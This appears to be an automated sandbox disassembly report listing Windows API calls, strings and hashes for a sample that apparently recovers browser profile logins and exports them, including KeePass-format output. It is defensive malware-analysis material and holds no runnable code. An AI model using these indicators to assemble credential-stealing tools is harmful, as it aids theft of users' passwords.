                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                            • {Unknown}, xrefs: 004132A6
                                            Similarity
                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                            • API String ID: 4111938811-1819279800
                                            • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                            • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                            APIs
                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                            • EndDialog.USER32(?,?), ref: 0040135E
                                            • DeleteObject.GDI32(?), ref: 0040136A
                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                            • ShowWindow.USER32(00000000), ref: 00401398
                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                            Similarity
                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                            • String ID:
                                            • API String ID: 829165378-0
                                            • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                            • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                            APIs
                                            • memset.MSVCRT ref: 00404172
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            • wcscpy.MSVCRT ref: 004041D6
                                            • wcscpy.MSVCRT ref: 004041E7
                                            • memset.MSVCRT ref: 00404200
                                            • memset.MSVCRT ref: 00404215
                                            • _snwprintf.MSVCRT ref: 0040422F
                                            • wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 0040426E
                                            • memset.MSVCRT ref: 004042CD
                                            • memset.MSVCRT ref: 004042E2
                                            • _snwprintf.MSVCRT ref: 004042FE
                                            • wcscpy.MSVCRT ref: 00404311
                                            Strings
                                            Similarity
                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                            • API String ID: 2454223109-1580313836
                                            • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                            • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                            APIs
                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                            • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                            Strings
                                            Similarity
                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                            • API String ID: 4054529287-3175352466
                                            • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                            • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                            • API String ID: 3143752011-1996832678
                                            • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                            • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                            APIs
                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$HandleModule
                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                            • API String ID: 667068680-2887671607
                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: _snwprintf$memset$wcscpy
                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                            APIs
                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                            Similarity
                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                            • String ID:
                                            APIs
                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                            • free.MSVCRT ref: 0040E49A
                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                            • memset.MSVCRT ref: 0040E380
                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                            • wcschr.MSVCRT ref: 0040E3B8
                                            • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                            • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                            • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                            • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                            Strings
                                            Similarity
                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                            • _snwprintf.MSVCRT ref: 0044488A
                                            • wcscpy.MSVCRT ref: 004448B4
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                            Strings
                                            Similarity
                                            • API ID: ??2@??3@_snwprintfwcscpy
                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                            APIs
                                            • memset.MSVCRT ref: 0040DBCD
                                            • memset.MSVCRT ref: 0040DBE9
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                            • wcscpy.MSVCRT ref: 0040DC2D
                                            • wcscpy.MSVCRT ref: 0040DC3C
                                            • wcscpy.MSVCRT ref: 0040DC4C
                                            • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                            • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                            • wcscpy.MSVCRT ref: 0040DCC3
                                            Strings
                                            Similarity
                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                            APIs
                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                            • memset.MSVCRT ref: 0040806A
                                            • memset.MSVCRT ref: 0040807F
                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                            • _wcsicmp.MSVCRT ref: 004081C3
                                            • memset.MSVCRT ref: 004081E4
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                            Strings
                                            Similarity
                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                            • String ID: logins$null
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            • memset.MSVCRT ref: 004085CF
                                            • memset.MSVCRT ref: 004085F1
                                            • memset.MSVCRT ref: 00408606
                                            • strcmp.MSVCRT ref: 00408645
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                            • memset.MSVCRT ref: 0040870E
                                            • strcmp.MSVCRT ref: 0040876B
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                            Strings
                                            Similarity
                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                            • String ID: ---
                                            APIs
                                            • memset.MSVCRT ref: 0041087D
                                            • memset.MSVCRT ref: 00410892
                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                            • DeleteObject.GDI32(?), ref: 004109D0
                                            • DeleteObject.GDI32(?), ref: 004109D6
                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                            Similarity
                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                            • String ID:
                                            APIs
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                            • malloc.MSVCRT ref: 004186B7
                                            • free.MSVCRT ref: 004186C7
                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                            • free.MSVCRT ref: 004186E0
                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                            • malloc.MSVCRT ref: 004186FE
                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                            • free.MSVCRT ref: 00418716
                                            • free.MSVCRT ref: 0041872A
                                            • free.MSVCRT ref: 00418749
                                            Strings
                                            Similarity
                                            • API ID: free$FullNamePath$malloc$Version
                                            • String ID: |A
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                            • API String ID: 2081463915-1959339147
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                            Strings
                                            Similarity
                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                            • API String ID: 2012295524-70141382
                                            APIs
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                            Strings
                                            Similarity
                                            • API ID: AddressProc$HandleModule
                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                            • API String ID: 667068680-3953557276
                                            APIs
                                            • GetDC.USER32(00000000), ref: 004121FF
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                            • SelectObject.GDI32(?,?), ref: 00412251
                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                            • SetCursor.USER32(00000000), ref: 004122BC
                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                            Similarity
                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                            • String ID:
                                            • API String ID: 1700100422-0
                                            APIs
                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                            Similarity
                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                            • String ID:
                                            • API String ID: 552707033-0
                                            APIs
                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                            • strchr.MSVCRT ref: 0040C140
                                            • strchr.MSVCRT ref: 0040C151
                                            • _strlwr.MSVCRT ref: 0040C15F
                                            • memset.MSVCRT ref: 0040C17A
                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                            Strings
                                            Similarity
                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                            • String ID: 4$h
                                            • API String ID: 4066021378-1856150674
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: memset$_snwprintf
                                            • String ID: %%0.%df
                                            • API String ID: 3473751417-763548558
                                            APIs
                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                            • GetTickCount.KERNEL32 ref: 0040610B
                                            • GetParent.USER32(?), ref: 00406136
                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                            Strings
                                            Similarity
                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                            • String ID: A
                                            • API String ID: 2892645895-3554254475
                                            APIs
                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
